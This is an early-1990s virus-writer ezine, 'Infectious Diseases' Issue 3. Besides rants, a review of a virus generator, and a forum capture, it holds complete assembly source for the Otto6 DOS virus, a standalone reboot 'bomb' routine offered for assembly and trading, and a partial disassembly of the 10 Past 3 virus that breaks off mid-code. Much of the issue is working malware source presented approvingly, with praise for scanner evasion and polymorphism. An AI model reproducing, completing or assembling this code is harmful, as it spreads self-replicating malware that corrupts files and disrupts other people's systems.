Copy Link
Add to Bookmark
Report

Infectious Diseases Issue 03

eZine's profile picture
Published in 
Infectious Diseases
 · 5 years ago

  

=================================
Infectious Diseases, Issue 3,
Contents:
=================================

Produced by Virulent Graffiti Virus Production Organization
Edited By The Attitude Adjuster

As one irate father said to his slightly preturbed son...

"Give me a reason I should let you use my computer, if all you do is
write viruses on it!?!"

Welcome to my world, dad!

Contents ..................................................... I-D003.001

Letter of Ranting from The Attitude Adjuster ................. I-D003.002

Phalcon/Skism Gý Review ...................................... I-D003.003

What I saw the other day on FidoNet .......................... I-D003.004

Disassembly of (HA) YAM's Otto 6 ............................. I-D003.005

Fred Cohen on Virus Based Products ........................... I-D003.006

Disassembly of 10 Past 3 ..................................... I-D003.007

Soupy Virus Source ........................................... I-D003.008

Rapidly Approaching .......................................... I-D003.009

The Confusion Ended? ......................................... I-D003.010

'Shit... What's wrong NOW?!?' ................................ I-D003.011

Disassembly of (we promise this is the last for now) the
Fellowship Virus ............................................. I-D003.012

DWI Source ................................................... I-D003.013

VGVPO Propaganda ............................................. VGVPO.ANS
The Adventures Guild Ad ...... TAG.ANS
Unphamiliar Territory Ad ..... UPT.TXT
Way Cool Lost Horizons Intro . HORIZONS.EXE

are those over the counter virus remedies doing nothing for you?

do you feel as if maybe youre a little bit fucked in the head for buying
that computer in the first place?

maybe its the annoying snide comments on the screen,

or the fact that windows doesnt seem to work anymore,

the secondhand software kills the drive blues...

whatever it is,

you have realized that we are winning,

and you are loosing...

badly


Greetings: Invalid Media, DecimatoR, GHeap, Dark Angel, Pyster,
Unfriendly Giant, HitMan, Mirage, Shades, all virus writers
everywhere, my Mom (my modem ate her!), ICTOA, Paul, Josh,
and anybody else I forgot... oh, yeah, and you too...
============================================
Personal Rant from The Attitude Adjuster
By... err, The Attitude Adjuster
============================================

Err... yo!

Welcome again to Infectious Diseases, and we hope you enjoy this
as much as you've enjoyed our past productions (right... sure...).

It has been a both discouraging and illuminating time since last
issue's release. I have raved on FidoNet more and more (those of you who
know me by name can see my great revelations... I have to keep myself under
control when I use my real name, hopefully I can get one of those Jon
Johnson type accounts to really allow me to express myself...), and was the
one who instigated the 'YAM really did write it' lie... I guess I've kind
of toned down on my YAM bashing, and even edited out most of the bad
comments about them in my dissassembly of their virus in this issue...

I was rather pissed/saddened at the busting of ARCV, which Phalcon/
SKISM has covered with commendable speed and accuracy, thanks guys!

Now, I must say both 'Thank You,' and 'Fuck You,' to all Virulent
Graffiti members, who have both tried and not tried to get articles in for
ID. I, being the asshole-take charge type guy I am edited and put this
issue together in about 4 days, and will probably release it without the
knowledge of the group... I am quite happy with it, mainly because it
contains my disassemblies, and little else... If you don't love yourself,
who do you love? Also, I am trying something new... I know that I love to
view the activation routines out of viruses, but, ripping the code out is
an undue pain in the ass, and, I'd rather not run just any virus on my
system... I have ripped the 'bomb' routines from Otto6, Soupy, and Fellow-
ship, and left them as seperate code under the disassemblies... Go ahead
and assemble 'em, show 'em off... trade with friends... ah... I need a
life..

You'll note that this has a 40Hexish/Social Delinquency look to it.
Well, both of those publications are quite successful, so I figured that I
should use a conglomeration to see what I could come up with... For those
of you that (in the past) call us a P/S copy group, we will again tell you
to go fuck yourselves... True, we both are doing a YAM disassembly, and
true, I am stealing a little of the format, but, the first is a pure
coincedence, and the seconds is professional opinion over ownership... Also
note that we are never planning to release an MPC hack, in Pascal or other-
wise!
========================
Review of the P/S Gý
By The Attitude Adjuster
========================

NOTE: The word 'idiot' is used throughout this document to refer to
people who would actually assemble MPC or Gý code and use it as an
original virus. Do not confuse this term with the 'idiot' which refers
to users of the 'Bad Influence' BBS (who would probably fit into the
other category as well!)

"Gý, Phalcon/Skism's newest virus creation tool, is designed to allow
everyone easy access to computer virus source code. More than a simple
Vienna hack generator, it creates viruses "on-the-fly" as per the user
specifications. Gý is designed to be easily maintainable and extensible
through the use of special data files created especially for use by the
program."
-=P/S=- Gý Documentation

I downloaded it eagerly, with the same anticipation I feel with
every P/S creation... I exited back to the famed 'C Prompt,' and began
unzipping the new find... but wait... I expected a revised PS-MPC... and I
was (happily) mistaken...

Dark Angel has created another classic (though sure to get listed
under PS-MPC in VSUM, 'cuz hey, she doesn't even know her own name, let
alone what to name anyone's virus... [she fucked me over too, guys!]),
even more effective than the PS-MPC (or prunes...), and even more elegant
than the most IDE-Filled, Icon Based piece of Dynamic Link Library trash.

'On- the-fly' virus generation has come a long way from the VCS and
VCL days. The code is excellent, and even improved over MPC coding. I am
amazed and thrilled by the size of the code, as it is most compact, a great
learning tool for code optimization.

The new 'debug resistance' is also a feature to be commended. Using
the Intel's 'one-byte-interrupt,' and the fact that this interrupt is used
as a breakpoint in debuggers makes for havok in most debuggers. Still, a
hardened programmer can slide by it, but, the 'one-byte-interrupt' factor
makes that a bitch, as the interrupt is, as I said, only one byte, instead
of the average 'CD XX' type configuration...


As with any virus generator, there are cons to be discussed.

DecimatoR makes this point quite clear in 40Hex-9... allow me to
quote him...

"The authors of MPC and VCL are very talented programmers. Unfortunately,
the users of their programs are just the opposite. REAL virus programmers
have a desire to LEARN assembler - it's a test of their skill and ability.
The users of MPC and VCL don't have that desire. They only have a desire
for recognition - and seeing their name in a virus is a massive ego trip
for them. Why? They did nothing that any Joe Blow couldn't have done
using a code generator. If they REALLY want to prove how cool they are,
let THEM write a damn virus generation program and release it. THAT ALONE
will show the world their skill and ability. As for USING the program,
well, I'm more impressed with a nicely formatted term paper using
WordPerfect than I am with viruses created using MPC and VCL. If you're
one of the lame idiots who uses MPC or VCL for "writing" viruses, then
listen up - those programs were written for 2 reasons - to prove the
programmer could write such a thing, and to be used as a LEARNING TOOL for
future virus writers - NOT to be abused the way they currently are."

Exactly the point I want to make, barring that he is not as violent
as I am... but I will stifle the CAPS LOCK here...

There WILL always be the idiots out there that refuse to learn,
merely to 'Wr1tE GnU \/1/>uZeZ (0/> \/I/>11)!!!1!11' Alas, they will NEVER
learn, and, though we may try, points like ours offer little help.

That's why my personal opinion of code generators is quite low. Yes,
it is a VERY impressive work, and, I commend DA for his, as I do Nowhere
Man for his VCL, but, I am still not a supporter of code generators.

It's the stigma I have with 'learning,' something that dates back to
when I was H/P avid (yeah, I' m a hacker turned programmer... yuk!). There
was a hush about users, you kept your mouth shut, learned what you saw,
read the t-files, and did slave work, like scanning, or simple hacking, and
you picked it up.

The code generator idea is fine with me, but, it's release to the
general public hits the nerve in me that many H/P people balked about when
SYS-75 information is released into the public... there seems to be too
much power in the hands of blithering idiots.

A beautiful virus, masterfully coded and programmed, with actual
work by a good-intentioned programmer is fine with me, but, like being
harassed by a company that has had it's INWATS fucked over, having my HD
smashed by a virus coded entirely in MPC, VLC, or Gý with a stupid FAT
fucker added in will really ruin my day. (On this note, this would never
happen... only the most heavily armored stealth will get thru my anti-
virus software, which I wrote myself)

Idiots will use the generator, whether you try to stop them or not.
The 'password' on VCL (which was shittily concealed anyway... I mean, the
average joe could tell the ZIP password was ARoseIsARose) did nothing, and
as a result, there are malicious VCL viruses out there.

This is why a listed future improvements bother me... let me quote
it directly...

"o Supports multiple, semi-polymorphic encryption routines (full
polymorphism coming soon)."

Yep... that's what it says, ' full polymorphism.' I have no doubt
that DA can do it. I have dissassembled (partially to source level) the MtE
and fucked with the new (and seemingly fucked up first version of) TPE and
have seen that it is not as hard as plugged to be, merely a task that must
be planned and charted from the start, as it is, in itself, a huge task.
Full polymorphism is something we would all benifit from, but, not to be
given in source form to idiots. I'd belive that text files on this subject,
or something of that like would be more appropriate... but, hey...

On the note of DA's semi-polymorphic routines, they are, indeed,
semi-polymorphic. In the future, he might try something like instruction
flipping or selective BS addition, as an alternative to full polymorphism.
I also fucked up in my original analysis, and I apologize. Assuming that DA
uses all 4 indexable registers (SI,DI,BP,BX) for indirect addressing, and
all other unused registers for counting purposes, coupled with INC/INC,
ADD, and SUB incrementing, and add and xor encryption (I assembled a total
of 100 different CFG files, and only found xor and add encryption) I'd have
to guess at 144 generic wildcard strings to suffice. This is, of course,
too many. Now, assuming that we apply code frame tactics, we get the
following:

MOV (UNKNOWN REGISTER), WORD (COULD BE THE INDEXABLE, MAYBE NOT)
MOV (UNKNOWN REGISTER), WORD (DITTO)
CRYPTLOOP:
002Eh (ONLY IN EXE INFECTORS, CODESEG OVERRIDE)
BYTE (CORRESPONDS TO REGISTER USED FOR OPERATION (INDEXABLE))
BYTE (EITHER 7 OR 37)
WORD (XOR OR ADD VALUE)

EITHER INC/INC, SUB (INDEX REGISTER), -02
OR ADD (INDEX REGISTER), 2

LOOP LOOPCRYPTLOOP (ONLY IF BYTE COUNTER IS CX)
(OTHERWISE)

EITHER DEC/DEC, SUB (BYTE COUNT), 2
OR ADD (BYTE COUNT), -2

OR (BYTE COUNT),(BYTE COUNT)
JNZ CRYPTLOOP

Alogrythmically, this is a piece of cake, which is great, 'cuz the
more alogrythmic scans that must be added to a scanner, the greater it's
size and slowness grow... score one more for the virus writers.

Indeed, with the addition of Gý into the world, this is one more
big score for the virus writers... thaks DA!

=========================
What I saw on FidoNet
Capture By The Attitude Adjuster
=========================

Here's something I pulled offa FidoNet Virus... kinda discourages me
in some ways I'll explain below.

===========================================================================
From : GREG GREELY Number : 858 of 987
To : ALL Date : 12/16/92 12:42pm
Subject : True story Reference : NONE
Read : [N/A] (REPLIES) Private : NO
Conf : 168 - Virus................(FN)

Hey, I have a true story for you all.

I got a call from a doctor' s office. Their computers were acting strange
and locking up so I went over there and took a look at the system. Nothing
was out of place until I scanned it. Turns out, the guy has a Stoned virus
that's gone critical and he didn't even know it. He had scan but didn't
know how to run it. Since the system was already critical, I needed a clean
system disk to run CLEAN. It turns out the system disk(the original) was
infected too. The other 2 copies of the system disk, Dbase 3++,
Wordperfect, Windows 3.1, all of them. Every single application and every
single disk he had were infected. I didn't have a system disk with me so I
had to charge him double for going home and getting one. Some people are
sooooooooo ignorant. What a moron.

--- Renegade v12-04 Beta
* Origin: DragonsLaire BBS - 718-596-5938 (1:278/613)
===========================================================================

Okay, Mr. Greely... what a moron, eh?

Is this the message Anti-Virus wants to give to the public? Be
smart or else... I hardly think so...

Anyway, as for this message, I feel so stupid now, 'cuz I don't
have a system disk laying here, and you' d probably have to charge me
double! I think that I should probably be shot because I am so anti-
virus ignorant.

Wake up, you idiot! The man didn't know... so, you ridicule him,
not a brilliant strategy. The man needed to be informed, not chastized
behind his back...

I'm not sure, is this the attitude of most "Anti-Virus
Professionals?" I'd like to know... if you consider yourself one, write
us on one of our boards...
===========================
Disassembly of Otto 6
By The Attitude Adjuster
===========================

Well... I can't help it, I wanted to brush up on my disassmembly
skills, as future projects may call upon them... so, I find the cheapest,
easiest looking virus I can find to tear to tiny little pieces.

YAM's Evolution magazine showed up on Unphamiliar Territory, and
after thoroughly laughing at it, I decided that I'd disassemble one of the
'virii' in it, just because they looked easy.

The code was cheesecake, but, some of it was a tad confusing, and
I have developed the following: "Stupid people do stupid things in stupid
ways!" I realize that this is a slightly old YAM virus, and does not do
justice to the level of some of their work, but, let's face it, some of
this is damn funny!

This code is a byte-for-byte matchup with Otto6, and I even followed
the alternate encoding used by YAM's assembler... (apparently theirs loves
to assemble using opcode r/m+mod reg, rather than the more conventional
opcode reg r/m+mod!)

Anyway, here's what Patti has to say about it...

===========================================================================
Virus Name: Otto6
Aliases:
V Status: Rare
Discovered: September, 1992
Symptoms: .COM file growth; decrease in total system & available free
memory; host program encrypted
Origin: United States
Eff Length: 640 Bytes
Type Code: PNCK - Parasitic Non-Resident .COM Infector
Detection Method: F-Prot, ViruScan, Sweep, AVTK 6.00+, UTScan 25.10+,
NShld V99+, Sweep/N
Removal Instructions: Delete infected files

General Comments:
The Otto6 virus was received in September, 1992. It is from the
United States. Otto6 is a non-resident, direct action infector
of .COM programs, including COMMAND.COM. It does install a small
portion of its code in memory, though it is not a complete copy
of the virus, and the virus is not infective from memory.

When the first Otto6 infected program is executed, the Otto6 virus
will install a small portion of its viral code at the top of system
memory but below the 640K DOS boundary. Total system and available
free memory, as indicated by the DOS CHKDSK program, will have
decreased by 2,048 bytes. Interrupt 9 will be hooked by the portion
of Otto6 resident in memory, providing it was not previously hooked
by some other program. Also at this time, the Otto6 virus will
infect one .COM program located in the current directory.

Each time a program infected with the Otto6 virus is executed, the
Otto6 virus will infect one previously uninfected .COM program
located in the current directory. Infected programs will have a
file length increase of 640 bytes with the virus being located at
the end of the file. The program's date and time in the DOS disk
directory listing will not be altered. The following text strings
are encrypted within the viral code:

"OTTO6 VIRUS, <<éS>>, YAM,
COPYRIGHT MICROSHAFT INDUSTRIES 1992"
"<<éS>> YAM, MICROSHAFT INDUSTRIES (tm.) 1992!"
"*.COM"

The Otto6 virus is an encrypted virus. It not only encrypts the
viral code, but the host program as well.

It is unknown what Otto6 does besides replicate.
===========================================================================

Oh, yeah, and I can tell you what it does besides replicate... it
displays it' s second copyright message when you press Ctrl-Alt-Del... big
shit, eh? Shit, I'm surprised that description doesn't read COM and EXE
growth... you can never be certainly with those wily little viruses!

===========================================================================
; Otto #6 Virus, By Youth Against McAfee
; Disassembly By The Attitude Adjuster of Virulent Graffiti for
; Infectious Diseases 3 and some other uses...

; Assemble with: TASM /m2 otto5.asm for a byte for byte matchup
; TLINK /t otto5.obj

; The assembled code will NOT execute... a big thanks to YAM for that one! The
; only workaround I got is to trace thru til the mov [00FFh], al, and just
; move the ip ahead to startencrypt!

.model tiny
.code
org 100h
start:
db 0e9h, 02, 00 ; jmp near virusentry

nop ; they had to be here
nop ; in the original

virusentry:
call getdelta ; get delta ofs
getdelta:
pop si
push si

sub si,offset getdelta ; sub original ofs

pop ax ; delta in ax
sub ax,100h

mov ds:[00FFh],al ; ds:00FFh == al
push si ; save delta

mov cx,260h ; ieterations
add si,offset startencrypt
cryptloop:
xor [si],al ; xor
inc si
rol al,1 ; rotate
loop cryptloop ; loop if cx > 0
pop si ; delta in si

startencrypt:
mov ax,word ptr ds:[first3+si] ; restore first
mov dh,byte ptr ds:[first3+si+2] ; 3 bytes
mov word ptr ds:[100h],ax
mov byte ptr ds:[102h],dh

lea dx,[si+file] ; find *.COM
xor cx,cx
mov ah,4Eh
findfirstnext:
int 21h

jnc checkinfected ; carry?
jmp takeithome ; no more files

checkinfected: ; check file
mov dx,offset 9Eh ; filename in default
mov ax,3D02h ; dta
int 21h ; open file r/w

mov bx,ax ; handle in BX

mov ax,5700h ; get file date
int 21h

cmp cl,3 ; cl = 3?
jne infectitthen ; nope

mov ah,3Eh ; infected, close
int 21h

mov ah,4Fh ; find next *.COM
jmp short findfirstnext ; again

infectitthen: ; infect the file
push cx ; push time
push dx ; push date
call lseekstart ; lseek beginning

lea dx,[si+first3] ; buffer at first3
mov cx,3 ; read 3 bytes
mov ah,3Fh
int 21h

xor cx,cx ; lseek the end
xor dx,dx ; fileside DX:AX
mov ax,4202h
int 21h
; 4D1h
mov word ptr ds:[fsize+si],ax ; save fsize
sub ax,3 ; calculate jump
mov word ptr ds:[fsize2+si],ax
call lseekstart
add ax,6 ; fsize+3

mov byte ptr ds:[lob+si],al ; lob of fsize+3
mov cx,word ptr ds:[fsize+si] ; size of file
lea dx,[si+heap] ; point at buffer
mov ah,3Fh
int 21h ; read

push si ; push delta
mov al,byte ptr ds:[lob+si] ; lod of fsize+3
add si,offset ds:[heap+3] ; point at code
call encrypt ; encrypt original
pop si ; pop delta
call lseekstart ; lseek beginning

mov cx,word ptr ds:[fsize+si] ; fsize
lea dx,[si+heap] ; buffer at heap
mov ah,40h ; write file
int 21h

jnc finishinfect ; error (attributes)
jmp short takeithome ; yes
finishinfect:
lea dx,[si+virusentry] ; write encrypter
mov cx,startencrypt-virusentry ; to file
mov ah,40h
int 21h

push si ; push delta
mov cx,heap-startencrypt ; virus length-crypt
; mov di,si ; delta in di
db 89h, 0F7h ; alternate encoding
add di,offset ds:[heap] ; point at heap
add si,offset ds:[startencrypt] ; point at virus
rep movsb ; copy code to heap
pop si ; pop delta

push si ; push delta
mov al,byte ptr ds:[lob+si] ; lob of fsize+3
mov cx,heap-startencrypt ; virus length
add si,offset ds:[heap] ; buffer at heap
call encrypt ; encrypt heap
pop si ; pop delta

mov cx,heap-startencrypt ; virus length
lea dx,[si+heap] ; buffer at heap
mov ah,40h ; write virus
int 21h
jc takeithome ; error?

call lseekstart

lea dx,[si+jump] ; buffer at jump
mov ah,40h ; write jump
mov cx,3
int 21h
jc takeithome ; error?

pop dx ; pop date
pop cx ; pop time
mov cl,3 ; set infected flag
mov ax,5701h ; set time
int 21h

mov ah,3Eh ; close file
int 21h

takeithome:
push si ; push delta
mov al, byte ptr ds:[00FFh] ; saved xor byte
xor cx,cx
; add cx,si ; the pricks use
db 01, 0f1h ; alternate encoding
add cx,3 ; ieterations in cx
mov bp,103h
mov si,bp ; unencrypt old code
call encrypt
pop si ; pop delta

mov bp,100h ; where to RET to

mov ax,0B0Bh ; RuThereCall
int 9

cmp ax,0BEEFh ; if beefy, it's
je skipinstall ; installed

xor ax, ax
mov ds, ax ; interrupt table
lds bx, dword ptr ds:[9*4] ; Int 9 -> DS:BX

push bp ; push ret addr
mov bp,offset ds:[old9] ; JMP FAR PTR
mov cs:[bp+si+1],bx ; offset
mov cs:[bp+si+3],ds ; segment
pop bp ; pop ret addr

mov bx,es
dec bx ; our MCB paragraph
mov ds,bx
sub word ptr ds:[0003],80h ; allow for us to get
; some memory
mov ax, word ptr ds:[0012h] ; 1st unused segment
sub ax,80h
mov word ptr ds:[0012h],ax ; replace valu

mov es,ax ; es = our new seg
push cs ; ds = cs
pop ds
xor di,di ; es:0000 = dest.
; mov bx,si ; more alternate
db 89h, 0f3h ; encoding!!
lea si,[bx+our9] ; buffer at our9
mov cx,200 ; more than enough
rep movsb ; copy 200 bytes

mov ds,cx ; cx = 0000
mov word ptr ds:[9*4],0 ; offset (int 9)
mov word ptr ds:[9*4+2],es ; segment (int 9)
skipinstall:
push cs ; restore segments
push cs
pop ds
pop es
push bp ; return to 100h
ret

encrypt: ; encrypt
xor [si],al ; xor
inc si
rol al,1 ; rotate left
loop encrypt ; Loop if cx > 0
ret

db 'OTTO6 VIRUS, <<',0E9h,53h,'>>, YAM, '
db 'COPYRIGHT MICROSHAFT INDUSTRIES 1992 (tm.)'

lseekstart:
push ax
push cx
push dx
mov ax, 4200h ; lseek beginning
xor cx,cx
xor dx,dx
int 21h
pop dx
pop cx
pop ax
ret

our9: ; our int9 handler
cmp ax, 0B0Bh
jnz NotRuThere ; not an ruthere
mov ax, 0BEEFh
IRet ; int return
NotRuThere:
push ax ; save registers
push bx
push ds

xor ax,ax ; BIOS segment
mov ds,ax
in al,60h ; get keyboard input
mov bl, byte ptr ds:[0417h] ; get shift status
test bl,08 ; alt pressed?
jz removeregistersandleave ; no
test bl,04 ; ctrl pressed?
jz whyisthishere ; no
cmp al, 53h ; delete?
jnz removeregistersandleave ; nope!
and bl,0F3h ; mask off bits
mov byte ptr ds:[0417h],bl ; place in bios
jmp onwardbuttheads ; go on

whyisthishere:
cmp al,4Ah ; why is this here?
jne removeregistersandleave
removeregistersandleave:
pop ds ; remove registers
pop bx
pop ax
; jmp returntoold9 ; more wierd
db 0e9h, 20h, 00 ; encoding!

onwardbuttheads:
push cs ; ds = cs
pop ds

mov ax,3 ; 80x25 text mode
int 10h

mov ah,2 ; set cpos
mov bh,0
mov dx,0A14h ; 10,20
int 10h

mov si,yamlogo-our9 ; point to logo
pointlessloop:
loop pointlessloop

lodsb ; load string byte

cmp al,0 ; end of string?
je coldbootus ; yes

mov ah,0Eh ; display char in al
int 10h

jmp short pointlessloop

returntoold9:
old9 db 0EAh ; JMP FAR PTR
dd 00000000 ; Int 9h

yamlogo db '<<',0E9h,53h,'>>, YAM, MICROSHAFT INDUSTRIES (tm.) 1992!'
db ' ',0

coldbootus:
mov dx,28h
mov ds,dx ; DS = 0028h
mov word ptr ds:[0072h],0 ; DS:0072h=0

; the above does nothing, as the byte they are looking to modify is
; the warm-boot status byte, at 0040:0072h... duh...

db 0EAh ; JMP FAR PTR
db 00h, 00h, 0FFh, 0FFh ; Cold Boot Vector

file db '*.COM',0 ; search wildcard

first3 db 0CDh, 20h, 00h ; buffered 1st 3

jump db 0E9h ; jmp near
fsize2 db 50h, 01h

lob db 56h ; lob of fsize+3

fsize db 53h, 01h ; filesize

heap:
end start
===========================================================================
; Hurredly written stand-alone demonstration of Otto6, By The Attitude
; Adjuster.

; Assemble with:
; tasm obomb /m2
; tlink obomb /t

.model tiny
.code
org 100h
start:
mov ax, 0B0B0h
int 9
cmp ax, 0BEEFh
jz exit

mov ax, 3509h
int 21h

mov word ptr [old9+1], bx
mov word ptr [old9+3], es

mov ax, 2509h
mov dx, offset our9
int 21h

mov dx, offset endofit
int 27h
exit:
int 20h

our9: ; our int9 handler
cmp ax, 0B0Bh
jnz NotRuThere ; not an ruthere
mov ax, 0BEEFh
IRet ; int return
NotRuThere:
push ax ; save registers
push bx
push ds

xor ax,ax ; BIOS segment
mov ds,ax
in al,60h ; get keyboard input
mov bl, byte ptr ds:[0417h] ; get shift status
test bl,08 ; alt pressed?
jz removeregistersandleave ; no
test bl,04 ; ctrl pressed?
jz whyisthishere ; no
cmp al, 53h ; delete?
jnz removeregistersandleave ; nope!
and bl,0F3h ; mask off bits
mov byte ptr ds:[0417h],bl ; place in bios
jmp onwardbuttheads ; go on

whyisthishere:
cmp al,4Ah ; why is this here?
jne removeregistersandleave
removeregistersandleave:
pop ds ; remove registers
pop bx
pop ax
; jmp returntoold9 ; more wierd
db 0e9h, 20h, 00 ; encoding!

onwardbuttheads:
push cs ; ds = cs
pop ds

mov ax,3 ; 80x25 text mode
int 10h

mov ah,2 ; set cpos
mov bh,0
mov dx,0A14h ; 10,20
int 10h

mov si,offset yamlogo ; point to logo
pointlessloop:
loop pointlessloop

lodsb ; load string byte

cmp al,0 ; end of string?
je coldbootus ; yes

mov ah,0Eh ; display char in al
int 10h

jmp short pointlessloop

returntoold9:
old9 db 0EAh ; JMP FAR PTR
dd 00000000 ; Int 9h

yamlogo db '<<',0E9h,53h,'>>, YAM, MICROSHAFT INDUSTRIES (tm.) 1992!'
db ' ',0

coldbootus:
mov dx,28h
mov ds,dx ; DS = 0028h
mov word ptr ds:[0072h],0 ; DS:0072h=0

; the above does nothing, as the byte they are looking to modify is
; the warm-boot status byte, at 0040:0072h... duh...

db 0EAh ; JMP FAR PTR
db 00h, 00h, 0FFh, 0FFh ; Cold Boot Vector

endofit:
end start
===========================================================================

========================
Virus Based Products
By Fred Cohen
Capture by The Fly
========================

I am surprised that so many well respected Virus-L readers and
writers failed to understand the implication of creating 1500 viruses per
day that are not detected by existing scanners. The point is that the
number or percentqge of viruses detected is not as important as the effect
of the product.

Of the CARO collection of over 1500 viruses, only a small portion
have ever been found at a substantial number of sites, and many are
collector-only viruses that have never appeared in the wild.

I am quite astounded by the concept that creating viruses in the
privacy of my home should offend anti-virus types. In fact, I have had
automated virus generation systems running for several years. At one point,
I was trying to create ecosystems by randomly generating tens of thousands
of candidates per day, many of which were successful viruses. Why does
this offend other researchers? And I take it from some of the comments
that these researchers have NEVER created a virus of their own to explore
the concept! It's sad that people who have never tried it feel free to
condemn it. Or have they done it and simply don't have the integrity to
admit it?

ASP has already introduced one virus-based commercial product
(which has never been detected as a virus by any scanner) which operates
quite well, and we are in the process of creating another virus-based
product designed to operate in LANs. Our users don't seem to be offended
by the optimization of resource utilization, automated distribution and
installation, high reliability, and small space used by our products based
on viruses, but it seems to offend the anti-virus community that all of
their overblown claims about all viruses being bad are being undercut by
benevolent viruses that are safe and reliable. In fact, most of our
viruses work on far more systems than most virus defenses, and they don't
spread where they are not supposed to go. They are easy to control and
remove, they are compatable with every DOS based system we have seen to
date, and they have never generated any unintended side-effects. Kinda
blows the whole "all viruses are bad" thing, huh!

NEW PRODUCT ANOUNCEMENT - BENEVOLENT VIRUSES IN LANS
AUTOMATE MUCH OF LAN MANAGEMENT - ANTI-VIRUS COMMUNITY
SHUDDERS - SCANNER PRODUCTS MUST ADAPT TO DIFFERENTIATE
BETWEEN KNOWN GOOD VIRUSES AND VARIENTS CREATED BY BAD
VIRUS WRITERS - FOR DETAILS CONTACT ASP

P.S. considering the people who agree with my recent postings, I may
have been wrong - nah - you know you're not saying much when everyone
agrees with you - the lemmings to the sea thing and all.
============================
Disassembly of 10 Past 3
By The Attitude Adjuster
============================

Well... I was bored, and, I am still relatevly bad at doing
disassemblies, so, I thought I'd do a seemingly interesting virus, and
do it well...

First, what Patti says...

===========================================================================
Virus Name: 10 Past 3
Aliases: 748
V Status: Rare
Discovery: 1991
Symptoms: .COM file growth; keyboard keypresses altered; system reboots;
hardware devices disabled or interference
Origin: Unknown
Eff Length: 748 Bytes
Type Code: PRaCK - Parasitic Resident .COM Infector
Detection Method: CPAV 1.4+, AVTK 6.0+, F-Prot, IBMAV, Iris, Panda, VNet,
VBuster 3.93+, ViruScan V99+, Sweep 2.43a+, Trend,
AllSafe, ViruSafe, NAV 2.1.2+, UTScan 25.10+, Vi-Spy,
CPAV/N, LProt, NShld V99+, Sweep/N
Removal Instructions: Delete infected files

General Comments:
The 10 Past 3, or 748, virus was submitted in November, 1992. This
virus was actually isolated much earlier, in early 1991. 10 Past 3
is a memory resident infector of .COM programs, including
COMMAND.COM.

The first time a program infected with the 10 Past 3 virus is
executed, this virus will install itself memory resident in low
available system memory, hooking interrupts 21 and 6B. Total
system and available free memory, as measured by the DOS CHKDSK
program, will not be altered.

Once the 10 Past 3 virus is memory resident, it will infect .COM
programs, including COMMAND.COM, when they are executed. Infected
programs will have a file length increase of 748 bytes with the
virus being located at the end of the file. The program's date and
time in the DOS disk directory listing will not be altered. No
text strings are visible within the viral code.

The 10 Past 3 virus activates between 15:10 and 15:13 (3:00PM and
3:15PM) every day, at which time it will cause the "Ctrl" or "Shift"
keys to be invokes occassionally when the system user enters a
character on the system keyboard. As a result, the character input
may not be the same as what the user intended. Additionally, it
either disables or interfers with the functioning of the following
devices on the days of any month indicated below:

1st day of any month - keyboard
10th day of any month - system hard disk
16th day of any month - system monitor/display
29th day of any month - disk drives

On the 22nd day of any month, unexpected system reboots may occur.

Known variant(s) of 10 Past 3 are:
10 Past 3-B: A 789 byte variant of the 10 Past 3 virus, this
variant adds 789 bytes to the .COM programs it infects,
including COMMAND.COM. It will occassionally display
the following text on the system monitor:
"Therese"
The text is visible within the viral code in all
10 Past 3-B infected programs.
Origin: Republic Of South Africa January, 1993.

===========================================================================
Now, allow me to quote from the woman who can't write...

'The 10 Past 3 virus activates between 15:10 and 15:13 (3:00PM and
3:15PM) every day, at which time it will cause the "Ctrl" or "Shift"'

Sheesh, Patti, grow a little programming knowledge, and maybe learn
how to read military time!

Anyway, here's the code, hope you like it... I found it to be a
thoroughly boring piece of code, 'cept for a few little things, just angles
I had yet to look from... As always, this is byte for byte with the sample
that I worked from... Scans as it, must be it ("Look man, RedX!" Ha!)...

===========================================================================
.model tiny
.code

; 10 Past 3, Disassembly done by The Attitude Adjuster for ID Issue 3.
; All hail the holy XCHG AX,AX!

org 100h

start:
db 0E9h, 1Dh, 00 ; jmp near intovirus
db 0B4h, 09h ; mov ah, 9
int 21h
int 20h
nop ; F!#K
nop ; F!#K
nop ; F!#K
nop ; F!#K
nop ; F!#K
nop ; F!#K
nop ; F!#K
hello db 'Hello world !', 0Dh, 0Ah, '$'

intovirus:
jmp short furtherintovirus
nop ; F!#K
saved2:
db 0Ah, 24h
jumpnear:
db 0E9h, 1Dh, 00h
sizestore:
db 20h, 00h
attribs:
db 20h
filetime:
db 42h, 8Fh, 51h, 15h
what:
db 01h, 00h
what2:
db 00h, 00h
old24:
db 56h, 05h,0E1h, 33h
db 00h
fileofs:
db 25h, 01h,0C4h, 34h

furtherintovirus:
mov word ptr ds:[100h], 10BAh ; Replace 1st 3
buffa2:
mov byte ptr ds:[102h], 1 ; bytes of COM

xor ax,ax ; Interrupt Table
mov ds,ax

cmp word ptr ds:[6Bh*4], 4246h ; check 1st ruthere
jne installus

cmp word ptr ds:[6Bh*4+2], 2206h ; check 2nd ruthere
je alreadyinstalled

installus:
call installvirusinmemory
jmp short alreadyinstalled
nop ; F!#K

installvirusinmemory:
mov word ptr ds:[6Bh*4], 4246h ; set RUTHERE's
mov word ptr ds:[6Bh*4+2], 2206h

push cs ; cs = ds
pop ds

mov ax, 3521h ; get int 21h
int 21h ; vector

modme2:
mov si, offset gobackfromwhenceyoucame ; save int 21h
mov [si+1], bx ; vector
mov [si+3], es

push es
push bx

pop dx
pop ds

mov ax, 256Dh ; int 6dh = int 21h
int 21h

modme1:
mov si, offset intovirus

mov ax, 40h ; bios
mov ds, ax

mov ax, ds:[0013h] ; (0040:0013=280h)
mov cl, 6
shl ax, cl ; shift to segment
sub ax, 800h ; minus 800 paras
mov es, ax ; in ES

xor di, di ; destination 0
mov cx, endofvirus - intovirus ; ieterations

push cs ; cs = ds
pop ds

rep movsb ; copy it

mov ax, 2521h ; set int 21h
push es
pop ds
mov dx, int_21_handler - intovirus
int 21h

mov si, 17h
mov byte ptr [si], 0
ret

alreadyinstalled:
call debuggerreboot

push cs
push cs

pop ds
pop es

mov ax, offset start
jmp ax ; advance to go

debuggerreboot:
mov ax, 0F000h ; hi bios
mov ds, ax

mov dx, offset 0FFF0h ; ssi = reboot
mov ax, 2501h
int 21h

mov ax, 2503h ; brkpt = reboot
int 21h
ret

int_21_handler:
push ax
push bx
push cx
push dx
push di
push si
push es
push ds

mov ah, 2Ah ; get date
int 6Dh

cmp cx, 7C7h ; is year 1991
jb datenogood ; Jump if below

cmp dl, 16h ; is date 22nd
jne onwardguys ; nope

db 0eah, 0F0H, 0FFH, 00, 0F0H ; reboot

onwardguys:
mov ah, 25h ; set int vector

cmp dl, 1Dh ; is date 29th
je dateisthe29th

